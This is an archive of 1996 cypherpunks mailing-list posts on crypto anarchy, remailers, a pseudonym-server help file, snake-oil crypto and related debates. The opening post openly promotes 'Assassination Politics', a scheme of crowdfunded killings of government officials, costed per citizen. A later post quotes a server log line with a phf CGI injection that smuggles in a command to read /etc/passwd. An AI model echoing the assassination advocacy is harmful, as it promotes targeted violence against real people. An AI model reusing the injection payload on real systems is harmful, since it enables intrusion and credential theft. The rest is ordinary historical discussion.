the biggest deal about disliking random citizen attacks are the ones who 
recommend replacing them with...nothing...and have no plan to solve the 
problems with any other method, violent or otherwise.  

[doctrinaire BS deleted]

>As the Marxist idealogues got frustrated by their evident lack of progress
>they turned to terrorism. The Bader Minehof gang believed that they could 
>spark the revolution by jolting society out of its complacency. Their
>strategy was remarkably like AP.

Somehow, I doubt it.  Anybody who thinks an AP-like system would be 
effective for bringing in his pet communist (or fascist, or monarchist, or 
anything other than pure-anarchic) government is an idiot.  AP is 
fundamentally anti-heirarchical in its leanings and effects.

>If the heads of large corporations were
>likely to be assasinated then noone would want to lead a large firm.

Who said companies need "leaders"?  Remember, I said AP is 
anti-heirarchical.  Any heirarchies, particularly those forced on people, 
are strongly deterred.  This includes social and religious heirarchies, BTW. 
 Even corporate heirarchies would only exist if approved-of by the vast 
majority of the shareholders, most of whom will be the workers as well.


> In
>fact as any person with counter terrorism experience will tell you the
>threat of death is remarkably ineffective as a means of intimidation. It
>creates the opposite effect, strengthening the resolve of the target. I
>discussed this point recently with someone close to Mossad who agreed.

Under a set of circumstances similar to the status quo, that is not 
surprising.  But that can change.  That WILL change.  People occupy 
positions of authority when they feel, personally, they are better off doing 
so than not.  Give the average member of the public (not merely crazed 
"terrorists") the opportunity to remove those people, and you won't be able 
to keep them around.  I mean, presumably they do their job for a salary and 
benefits, right?  How many bombs or bullets will they tolerate, rather than 
resigning and taking a safer job?


>Terrorism is becomming an increasing concern. The amount of damage an 
>individual can cause is much greater than that possible in the past.

If anything, I think the advantage of AP is that it REDUCES the amount of 
damage that any given person has to cause, per citizen, to achieve his 
anti-government political ends.  I've pointed out that it would only take a penny or two 
from each citizen, on average, to remove one of even the highest-level US 
officeholders.  Far less than that if you include resignations.  What I'm 
advocating is a system that makes it impossible for agents of the status quo 
to resist the opposition of the public, which is unlike the current system.  
Rather than have to build a bomb, or wait for somebody else to do so, the 
ordinary citizen only needs to make a modest contribution to the "revolution 
fund."   And today, an officeholder can claim to resist "terrorism" based on 
the fact that he opposes the extreme action of a handful of people.  What 
happens when they have to admit that a million people paid for that gun to 
be fired or that bomb to be planted?


>There
>are plenty of exhausted ideologies about which can be fashioned into
>a justification of murder.

Don't blame me for them.

> Jim's post shows very clearly how Libertarianism
>can be converted into a justification for terrorism. Its a very short gap
>between being opposed to government and actively fighting against it. 

What, exactly, is the MEANING of "being opposed to government"?  If you pay 
taxes to support that government (even if that support is not voluntary) 
those taxes mean that you are indeed acting to strengthen that government 
and assist its efforts.  I suggest that you can't realistically claim 
"opposition to government" (other than rhetorical) under these circumstances.


>I see libertarianism as the exhausted remnant of the mercantilism of the 
>1980s. As constructed it recognises only those rights which favour the
>privileged in society and none of those which benefit the ecconomically 
>disadvantaged. Politically it reached its peak influence almost a decade
>ago when Regan and Thatcher were at their zenith. The '94 congress will 
>probably be seen as the turning point in the political tide with the 
mainstream
>of politics moving back to the left again. There will always be people arround
>who conclude that the failure was not being close enough to the ideology.


You've already made it clear you don't consider yourself a libertarian.  Why 
go on with this stuff?

>If the libertarians are not carefull they will be inexorably linked in the 
public mind 
>with the terrorists who act in their name. 

I think the stereotypical "terrorist" doesn't really claim to "act in their 
[the public's] name."  The one recent counter-example that I've heard of, 
that of the EPR in Mexico, is a very welcome exception.  If anything, I 
think the governments of the world are truly frightened that "terrorism" as 
commonly practiced will change from the "blow up random airliner" mode, 
passing through the "blow up nearby government building" mode, to "find and 
kill a particular official" mode.  Far less collateral damage, far harder to 
whip up public opposition to in the press, etc.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 23 Sep 1996 12:00:40 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
In-Reply-To: <ae6acbab000210047c0c@[207.167.93.63]>
Message-ID: <3245E50C.4B10@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 4:44 PM 9/22/96, Dale Thorn wrote:
> >The basic outline for any products included (and don't forget, just
> >getting included is some sort of endorsement, if you know what I 
> >mean)
> >could be a feature/bug listing, using common crypto terminology, and
> >could be followed by side-by-side argument paragraphs from the author
> >and from a reputable review panel.
> >The usefulness of the list would probably depend on:
> >1. The participation of all those names people like to name-drop on
> >this forum.
> >2. And/or the quality of the list itself if done without (1.) above.
> >   In this latter case, it could still be useful, but the variances
> >in evaluation owing to personal bias would be difficult to overcome.

> The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons 
> most in need of it won't read it.
> If those who post descriptions of their "Unbreakable Virtual
> Whammo-Matic Really Complicated Transposition Cipher" have not
> bothered to read Schneier or other basic texts on ciphers, why would
> they bother to read a Snake Oil FAQ? This applies to their customers 
> as well.

[additional text deleted]

Maybe I shouldn't have tried to (slightly) change the subject.  It was 
my thought that someone could encourage the person(s) who wanted to do a 
Snake-Oil product list to generalize the list, to be a more scholarly 
reference, and not just a blacklist.  Since the original(?) proposal 
concerned actual products, and not just techniques which fit into neatly 
identifiable categories, that might justify a Consumer Reports type of 
review list for these products.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Sep 1996 09:47:04 +0800
To: jack <thecrow@iconn.net>
Subject: Re: Evolving algorithm for faster brute force key searches?
In-Reply-To: <31DD74B1.BB3@iconn.net>
Message-ID: <199609222305.TAA08525@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The problem with your idea, Jack, is that any decent crypto algorithm
will change on average half the output bits when one bit of the key is
changed. In other words, by definition, if you can do this, the
algorithm isn't as strong as it should be.

However, you are correct that failures to meet this standard properly
can be found in some popular algorithms. You might want to read Biham
and Shamir's book on differential cryptanalysis for details.

jack writes:
> I got an idea last night, maybe this has already been thought of and
> tried, but I thought I would give a quick outline of the program I was
> thinking of:
> 
> -Specify a maximum key size (assume 1024bits or something)
> -Start with an arbitrary key "aaaaaaaaaaaaaa"
> 
> Start a loop
> 
> -create five mutations of the key
> -use each key to try and decrypt a few bytes of the message
> -run a (or some) statistical analysis tests and come up with a value
> for how 'random' the decrypted bits are
> -Pick the key that produced the least random ouput
> 
> Repeat
> 
> 
> Probably this wouldnt work on any very strong algorithm, but it seems it
> might be effective against some.  I am going to write the code and try
> it out on RC4 and on a weakling little algorithm I wrote a while back.
> Let me know what yall think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 23 Sep 1996 08:15:19 +0800
To: cypherpunks@toad.com
Subject: crypto anarchy vs AP
Message-ID: <199609221810.TAA00172@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Been reading the AP thread, and thought I'd donate some of my views.

To me, crypto anarchy is a means to achieve a more libertarian
government, it is a pivotal tool to reduce government power, and
enable freedom and privacy.  A libertarian government means a less
powerful government, less taxes, less onerous laws, more freedoms.  I
don't think AP as stated by Jim could escalate quickly enough as a
mechanism to introduce a libertarian government, because if it got to
the state that too many politicians were openly threatened, and
killed, the government would declare a state of war, and switch off
the Internet.  You'd just cause the government to panic, and this
would have negative effects, it would take ages for them to calm down,
and the laws they'd pass in the mean time would mean a near certainty
of mandatory GAK as a condition to switching the Internet back on.

(Before someone takes me to task for the impossibility of switching
the Internet off, it all depends on the level of government panic.
More specifically perhaps they would disconnect key backbones, and
ISPs briefly while they rushed into effect a few presidential decrees
outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets,
etc.)

I think I understand what Jim is saying with AP, that it might be a
way to accelerate the arrival of libertarian government.  I'm not
saying I have any moral problems with a suitably restrained version of
AP, if it saved lives and resulted in a better life for many people.
(Some people might even view it as having a certain element of poetic
justice:-)

However I don't think it would survive the above hurdle.

(Also I have some thoughts on why AP might not achieve the desired
effects even if it could survive the hurdle which I will save for now,
in the interests of keeping this to a digestible length.)

Libertarian governments, if they come, I think will be more easily,
and more likely achieved via non-violent means.  I think it will be a
much more gradual process, and that government power will just be
gradually eroded as international businesses gain power, and borders
become more open, trade more free, as travel becomes cheaper, and
moving to another country becomes less of a hassle.  Telecommuting,
and remote education should help reduce the problems of moving
country.  If you telecommute, and your kids (if you have any) are
taught via the Net, and you can talk to your friends in photo
realistic real time VR chat rooms, it becomes much less important
where on the planet you live.

As information based work becomes more important, significant
proportions of government tax revenues may be siphoned off to
tele-workers from tax havens, and to those who just ignore local tax
laws in favor of anonymous ecash.  The ability to jurisdiction shop
for laws, and taxes in itself will reduce governments options.  It
will induce governments to try to provide incentives for international
businesses to use their jurisdictions, and to create the appearance of
as free a life style as they can for individuals.  The jurisdiction
shopping will start amongst the disenfranchised, and the adventurous,
but will spread as the advantages become clearer, and the hurdles are
reduced.  Tax collection will be restructured to tax tangibles, and
reduced to encourage customers (citizens).

Governments are currently flailing around trying to prolong the
inevitable.  The fall out from this is beginning to annoy some people.
If it annoys enough people soon enough that they vote in a Libertarian
candidate for president in the next 20 years, crypto anarchy, and
libertarian governments could be reached more quickly.  I'm not sure
it will ever get that far though, because the more votes the
libertarians get over the following years, the closer we get to
libertarian anyway, because the government has to start adopting their
policies to get the votes back.  (Much like the green movement, which
once it started getting significant votes, and media attention, was
pandered to by politicians of all parties.  They're all green now:-)
And so libertarian thinking starts to affect government thinking.
Crypto anarchy privacy preserving goodies such as anonymous ecash,
anonymous email, strongly free speech, right to encryption start to
fair better, and so start to undermine whats left of government.
Politicians, now posturing to try and look more libertarian might even
start to take on board the idea that there are simply too many
government employees, that may be the war on drugs causes more
problems than it solves, that sounding pro free speech is something
that might carry some votes, etc.

By the time governments get weak enough for AP to be feasible, they
will be so weak, and eager to entice you into their jurisdiction with
promised single digit tax rates, private dietary recommendation
services, friendly police forces, advertised local highlights: local
casinos, brothels, cuisine, favorable climate, reasonably priced
housing, etc, etc. that no one will care much about offing the fawning
officials (head salesmen, and brochure designer) anyway.

Well thats my theory :-)

It could all suffer a huge set-back if the government panics too soon,
and passes mandatory GAK by presidential decree or something.  One
hopes that whats left of the US first ammendment, and judicial system
would be enough to repeal such a move, but you never know.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 23 Sep 1996 03:57:37 +0800
To: cypherpunks@toad.com
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <v03007806ae65f51d7702@[198.146.120.234]>
Message-ID: <199609221731.TAA18577@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"Myers W. Carpenter" <bmcarpenter@trevecca.edu> wrote:

>         Does anyone have any idea who might be attempting a Macintosh
> Mixmaster port?  I and some other people were eyeing the idea.  If you
> know who might be doing this port I would appreciate hearing from them.
>         Thanks.
>                         myers

You can run mixmaster on a mac, see http://mklinux.apple.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shane Brath <sbrath@froglit.scitele.com>
Date: Mon, 23 Sep 1996 11:18:17 +0800
To: Wearen Life <runnerfx@octet.com>
Subject: Re: Go away CIA
In-Reply-To: <Pine.BSF.3.95.960921101351.28537A-100000@iron.octet.com>
Message-ID: <Pine.BSD/.3.91.960922192936.9708B-100000@froglit.scitele.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 21 Sep 1996, Wearen Life wrote:

> I wont be suprised if they where ALSO watching who was visting your page.
> I think now is the time to start looking in your hard drive or floppy
> disk for anything that my incrimanate you. (did i spell that right)?

My 2 cents. 

But how would they go about globaly watching who goes to your URL, unless 
they hack into your server and look at the log, or have a network sniffer 
at a access point feeding you?

> > Well well...
> > 
> > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> > I learnt a few things.
> > 
> > o it got 50,000 hits in 1 day
> > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
> >   department looked at it masses of times. The CIA looked at it every 10-15
> >   minutes.
> > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
> >     281
> > 
> > o Even the CIA tries to hack you.  
> > 
> > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180
> > 
> > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
> >   ncsc.mil sites.
[ rest of text snipped ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Ono <wmono@direct.ca>
Date: Mon, 23 Sep 1996 17:06:41 +0800
To: cypherpunks@toad.com
Subject: Re: Jena Remailer
In-Reply-To: <199609221720.KAA15948@sirius.infonex.com>
Message-ID: <Pine.LNX.3.94.960922194440.263B-100000@crash.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996, Mixmaster wrote:

> The trickiest thing about it - by far - is the inscrutable English
> translation of the helpfile.  I have been trying for over a week to make
[...]
> Can any native English speaker please paraphrase the account start-up
> procedure for us?

I took a stab at re-writing the help file, and I've attached it below.
The operator of jena might want to use it instead of the help file
currently being distributed, after correcting any errors and adding the
German sections back in.

IMHO, the How do I.. section is the most useful.

I believe these instructions are correct -- I was able to follow them to
create a nym, and use it.  YMMV.


--
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."




Pseudonymous Server Help
~~~~~~~~~~~~~~~~~~~~~~~~

This pseudonymous server allows private, pseudonymous communication.  When
used with chained remailers, true pseudonymity without fear of a connection
to a real address can be achieved.


Some things to remember about this server:

 - When creating a pseudonym, a special PGP key created for this purpose is
   sent to the server.  This will be used to name the pseudonym, and assign
   a Email address.

    * The hexadecimal key-ID forms the Email address.  For example, if the
      nym's key is 0x01020304, the address will be:
        anon-01020304@as-node.jena.thur.de

    * The user-ID of the key contains the pseudonym, only.  Note: This is
      different from the convention, which is to include the Email address
      in angle brackets.

 - To publish something under a pseudonym, send a encrypted, signed email
   to this server, which will post it to one or more Usenet newsgroups,
   or send it via Email.

 - Anyone is able to reply to items published under a pseudonym.  Anything
   sent to the pseudonym's Email address is stored on the server, encrypted
   with the pseudonym's public key.

 - Because the server does not know (and does not want to know) the true
   identity behind a pseudonym, mail cannot be delivered directly.

 - Mail is delivered only when a signed, encrypted request is received from
   a nym.  At this time, all waiting mail is sent to the address specified
   in the encrypted message.

 - The server never answers.  If something goes wrong, the job will be
   dropped silently.


All commands are sent in the Subject: header of the unencrypted
(plaintext) message, and should be Emailed to anon@as-node.jena.thur.de
There are two commands:

 help - sends the server's help file.

 send - delivers waiting mail.  The body of the Email should be a signed,
         encrypted message with a Reply-To: header, which is where the
         mail will be delivered via Mixmaster remailers.  (The key that
         the body is signed with determines which nym's mail is delivered.)
         The nym's mail spool is then purged.  To prevent replay attacks,
         the signature must be less than 48 hours old.  If the signature
         is not valid, the request is bounced and the headers are saved,
         encrypted, in the nym's mail spool.


If no valid command is found in the Subject: header, the body is checked for
a signed, encrypted (to the server) message.

If the signature is from a keyID belonging to an existing nym, and the
check fails, the headers are saved, encrypted, in the nym's mailspool.  This
is to alert the owner of the nym to a possible spoof attempt.

If the signature check fails because the keyID that the signature is from
is unknown, the decrypted body is assumed to contain a public key for a
new nym, which will be added to the server's database.


If the signature is valid, the decrypted body should be a header for the
outbound mail, followed by a blank line, then the body for the outbound
mail.  The following are headers considered valid by the server:

 * Subject: (or Anon-Subject:)

 * To: (or Anon-To:)

 * References:

 * Newsgroups: (or Post-To: or Anon-Post-To:)

 * Followup-To: (or Anon-Followup-To:)
    - This must be specified as a -single- newsgroup if cross-posting

All outbound messages has Precedence: junk to silently drop error messages.


If any of the above conditions are not met, the server will silently drop
the job.

This server must not be used to transmit illegal materials, flames, or
binary data.  I may disable nyms that misuse the server.

The German telecommunication laws may require me to modify the server to
allow access to intelligence agencies without notification.  You are
advised to use Mixmaster remailers and other alias servers -- it is
recommended that you do not request mail to be sent to your own Email
address.




How do I ..
~~~~~~~~~~~

..create an identity?

 - Run 'pgp -kg' to generate a new key.

    + Select your keysize.  (a 1204-bit or larger key is recommented)

    + Enter your pseudonym as the user-ID.  Do not enter an Email address.

    + Enter a passphrase.  (Make sure not to forget it!)

 - Run 'pgp -kxa "pseudonym" > anonid.asc' to extract your public key.

 - Run 'pgp -esa -u "pseudonym" anon@as-node anonid.asc' to sign and
    encrypt the extracted key for the server.

 - Mail the result to anon@as-node.jena.thur.de with a Subject: header that
    does not include the words 'help' or 'send'  (It is recommened that
    you do this through one or more anonymous remailers.)

 - Test your nym by posting to a test group (de.test is recommended due
    to the location of the server) and wait several days before requesting
    mail delivery.

 - If it didn't work, repeat the entire procedure.  It's possible that the
    key-ID already exists in the server's database and belongs to another
    pseudonym.



..Email a message?

 - Write the mail body, remembering not to include any information about
    your true identity.

 - Add the following headers at the top of the mail:

     To: destination@of.mail
     Subject: Outbound mail's subject line

   Leave a blank line between the headers and the body.

 - Save the file.

 - Run 'pgp -esa -u "pseudonym" anon@as-node filename' to sign the mail
    with the nym's key, and encrypt it for the server.

 - Mail the result to anon@as-node.jena.thur.de with a Subject: header that
    does not include the words 'help' or 'send'  (It is recommened that
    you do this through one or more anonymous remailers.)



..post an article?

 - Write the article's body, remembering not to include any information
    about your true identity.

 - Add the following headers at the top of the mail:

     Newsgroups: a.newsgroup.name
     Subject: Article's subject line

   (If cross-posting, remember that a Followup-To: header is required.)

   Leave a blank line between the headers and the body.

 - Save the file.

 - Run 'pgp -esa -u "pseudonym" anon@as-node filename' to sign the mail
    with the nym's key, and encrypt it for the server.

 - Mail the result to anon@as-node.jena.thur.de with a Subject: header that
    does not include the words 'help' or 'send'  (It is recommened that
    you do this through one or more anonymous remailers.)



..request Email to be delivered?

 - Create a file containing the following:

     Reply-To: address@for.delivery

   Leave a blank line after the header.

 - Save the file.

 - Run 'pgp -esa -u "pseudonym" anon@as-node filename' to sign the mail
    with the nym's key, and encrypt it for the server.

 - Mail the result to anon@as-node.jena.thur.de with a Subject: header that
    does not include the words 'help' or 'send'  (It is recommened that
    you do this through one or more anonymous remailers.)




Things to remember
~~~~~~~~~~~~~~~~~~

 - Never send mail directly to the server.  Always use at least one remailer
    to hide your identity.  The best way to protect yourself against a
    police 'request' is to ensure that the server cannot determine your
    identity.

 - Use Mixmaster remailers for increased protection.  Use
    mixmaster@as-node.jena.thur.de as the final hop to defeat traffic
    analysis.

 - Never request a delivery to your real Email address.





Typ  Bits/ID       Datum      Benutzer
Type bits/keyID    Date       User ID
öff  1024/D3305539 1996/05/01 Jenaer Anonymous Service <anon@as-node.jena.thur.de>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzGHxbMAAAEEALWo6oH8J48d1QhSrkbQCt/PZorS5o/9vEQ0DC2UHxivY98i
AcYnq2Dxv3mQYFxcA4Zl5kAGoZCwUadlubLYPeXP2dpZlcjlI87IBsOK37B3+dQL
9ax0biK8SILNopepwReJTywwNhAoeu2DNqMJDOjocrRTTJCP+0oZs23TMFU5AAUR
tDRKZW5hZXIgQW5vbnltb3VzIFNlcnZpY2UgPGFub25AYXMtbm9kZS5qZW5hLnRo
dXIuZGU+iQEVAwUQMYfTDAnccDk5839dAQGy7wgAp23a76rW1QU9Sc+HyLBzrEnE
usBFQrCDozcO1K9pOE+NYQcQwArnNHpm3+wF/afAsPLsNyD84Cm4vVba7QeAWUx1
un0HFHE840wS9g0S+FUUjoPW/foNVcGFN5RcUJWVSvXSNfihz6JwuuyFZWuZNUdD
RA4ta1V9uMM/x+lVmlYQ7PvkBbZXSQS1gkBQAZyxFNx0OOtqxcsLHxJ05FJrniDu
r0VRZzkqI1qyUFBlYkd4nx7xA8QraDH7nPWMisiXtxNzuDBW+Cnkdh1xOneS1gzE
7Ssm9r5ktSV+ZQqmk6sh0qeFsWtGQLG6TJBDjb9uNS18dkkru0svZNcrGY+EL4kA
lQMFEDGHxbNKGbNt0zBVOQEB5aQEAInk+hdiDVyXnuIKsMgXPfxVJtmzqblvmGTV
gRr+7kDlC+Y6ZK1qbeI+uDNJsDGmLkP7Uez+7IwFASrr+bc4ZCbkQK5FZIJvlXLs
gkYbvuIzpppR4RfkEpeawehw0ZNuXXpxI6K9P1DabXI+OdVaNG7Lj0Qr5Iac7Vz2
056eXiNH
=6tO4
-----END PGP PUBLIC KEY BLOCK-----



Jenaer Mixmaster Anonserver
=-=-=-=-=-=-=-=-=-=-=-=
jenanon mixmaster@as-node.jena.thur.de 54e0023828fabe0b85e83b3d458134e3 2.0.3

-----Begin Mix Key-----
54e0023828fabe0b85e83b3d458134e3
258
AASVur47+5caGetEAZJKG/s5uEjXZb+1epW5UWV1
a4Tt/osQKS+c5gxnArSwDyXHsnt9MxDznhRAR73D
CT+2a/NC494VAV4MoWGAZI0NZtw8brvzZza/9qp9
V3tlbaIjnPVhGqlPFG6lyTi1BLCJGqMUQZMQWLt5
8Q2AGklC/SYg6QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Mon, 23 Sep 1996 11:27:36 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Spam from Timmy May (fart) and his merry band of mailbombers
In-Reply-To: <5saouD5w165w@bwalk.dm.com>
Message-ID: <3245dfcc3e29002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM said:
> Is this another one of Tim May's accounts?
> 
> ]From varange@crl.com  Sun Sep 22 15:39:37 1996

Gee, Larry^H^H^H^H^HDimitri, the proper word is tentacle. As you
might recall, we're all just tentacles of TC May.

-- 
Kevin L. Prigge                     | "I rarely saw people sitting at
Systems Software Programmer         |  computers producing real code
Internet Enterprise - OIT           |  wearing ties." - Philippe Kahn
University of Minnesota             | (speech at Software Development '90)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Ono <wmono@direct.ca>
Date: Mon, 23 Sep 1996 16:41:59 +0800
To: cypherpunks@toad.com
Subject: Re: Jena Remailer
In-Reply-To: <Pine.LNX.3.94.960922194440.263B-100000@crash.direct.ca>
Message-ID: <Pine.LNX.3.94.960922200205.340D-100000@crash.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to followup on myself, but I made a mistake in the help file.


On Sun, 22 Sep 1996, William Ono wrote:

> How do I ..
> ~~~~~~~~~~~

> ..request Email to be delivered?
> 
>  - Create a file containing the following:
> 
>      Reply-To: address@for.delivery
> 
>    Leave a blank line after the header.
> 
>  - Save the file.
> 
>  - Run 'pgp -esa -u "pseudonym" anon@as-node filename' to sign the mail
>     with the nym's key, and encrypt it for the server.
> 
   - Mail the result to anon@as-node.jena.thur.de with a Subject: send
      header.


Sorry about that, folks.


--
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 23 Sep 1996 11:00:23 +0800
To: gbroiles@netbox.com (Greg Broiles)
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net>
Message-ID: <199609230120.UAA01100@homeport.org>
MIME-Version: 1.0
Content-Type: text



Greg Broiles wrote:

| At 03:16 PM 9/22/96 -0500, Adam Shostack wrote:
| 
| >	A real Mac port of Mixmaster, that integrated with Claris
| >EMailer and Eudora would be a huge boon to the millions of Mac users
| >out there.  I have no doubt that Vinnie's mac crypto conference talked
| >a lot about this sort of thing.
| 
| Actually, the Mac crypto conference didn't spend any time at all on
| Mixmaster - which is not intended as a criticism of either the conference
| or of Mixmaster, but it just didn't happen. 

	(By this sort of thing, I was refering more to the privacy
apps 'integrated with Claris EMailer and Eudora,' which you go on to
discuss.  I think that a remailer client needs to be integrated with
the usual mail tools, not seperate.)

| I gave a very short talk and said that I thought the Mac needed three apps,
| for people who wanted to jump in a write something useful to the cause of
| privacy on the net and didn't want to reinvent any wheels: a remailer
| client with a good user interface, a Mac-native remailer, and an
| implementation of DC-nets. Mixmaster would, of course, address two of those
| three. Lucky tells me that there is already a Mac implementation of
| DC-nets, but it doesn't seem to be very well known.

	I don't know of any DC net implementation, and would be really
eager to hear Lucky expound on this.

| For what it's worth, I think future remailer/Mixmaster development might do
| well in Java. I'm not especially sold on or trusting of the alleged
| security or trustability features of Java (sorry, no offense) but I *do*
| think it's a neat tool for building non-machine specific network aware
| applications. Ignore the fact that people use it to build silly animations
| or that downloadaded applets may or may not be secure - it's still useful
| as a development tool.

	I agree, especially if we write a protocol that allows a user
to connect to a mixmaster, get a pool of messages, and remail them on
to their destanation, along with a message of his own.  (This is a
half baked idea; there are obvious denial of service issues, as well
as reliability issues in the well intentioned cases.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Mon, 23 Sep 1996 13:54:51 +0800
To: "'dlv@bwalk.dm.com>
Subject: LD
Message-ID: <01BBA8C5.36647EC0@king1-20.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulius, you made this remark to someone:

...You really should get to know L.D. better
before you repeat the lies Timmy May spreads about him.
.........................................................................................


May I recommend that you read the content within these urls:

http://www.csn.net/~ldetweil/

	and especially:

ftp://crvax.sri.com/risks/15/risks-15.27 (and 28)

These contain a history which will clarify for you some of the comments made about L.D.'s relationship to the list, Tim May, etc.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 23 Sep 1996 12:58:36 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Near-Necessity of Health Insurance
In-Reply-To: <ae64a320080210046e61@[207.167.93.63]>
Message-ID: <199609230140.UAA00443@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. May said:

> However, I am thinking about getting some. Not so much because I'm getting
> older, but because I fear a new phenomenon: hospital emergency rooms
> refusing admittance of patients unless they can present the proper
> patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross,
> Kaiser, or whatever).
> Anyway, I'm thinking of finally bowing to the inevitable and starting to
> fork out $200-300 a month for health care I am unlikely to routinely use.

     There is a "class" of insurance (and I am sure that someone will cornect
me if I am wrong) whose name I forgot, but it is more or less "Calamity" or
"serious accident" insurance. It doesn't cover things like sore throats, 
physicals (something you might want to look into, they can catch things before
they get serious, and you are getting along in years), simple stitches &etc,
but does cover things like getting nailed by a drunk driver, as presumably
accidental shootings by black clad ninjas. 

     Consult your local fraudmeister for more information. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 23 Sep 1996 11:34:56 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Death Threats
In-Reply-To: <ae69ba1d01021004cb52@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960922204524.3921P-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


...
On Sat, 21 Sep 1996, Timothy C. May wrote:
> 
> Hey, I'm a candidate for President, too (at least I know of someone who
> plans to vote for me). Does this mean I am protected against various
> threats, and veiled threats? Let me know, as I seem to be under attack by
> certain Russian-developed spambots.
> 
> More seriously, the whole set of protections the President has is
> inconsistent with our nominally anti-royalist approach. Of course, America
> long ago created its own royalty. Even dynasties (how else do you explain
> Teddy Kennedy getting away with the Mary Jo Kopechne thing?).
> 
> Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but
> there is no reason to make special laws covering certain persons.

The law specifically criminalizing threats against the President (and 
other specified persons) gives federal authorities jurisdiction to 
investigate the cases, which frequently have interstate connections.  It 
is relatively difficult for a state to investigate and prosecute an 
interstate case.

That's not the only reason for the law, though.

EBD 




> (* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of
> crime"? Don't I believe in free speech? Well, if I hear that Vladimir G.
> Nulis says I should be killed, and that he is coming to California to take
> care of this, I have no compunctions, liberrarian or otherwise, about
> shooting first at the first sign of his appearance on my property.
> Understandably, the government does not wish this to happen. Thus, I have
> no problem with illegalizing direct and concrete threats. General threats,
> such as "all lawyers should be taken out into the parking lot and garotted"
> are not specific, direct, and concrete, and hence fall under the free
> speech provisions.)
> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
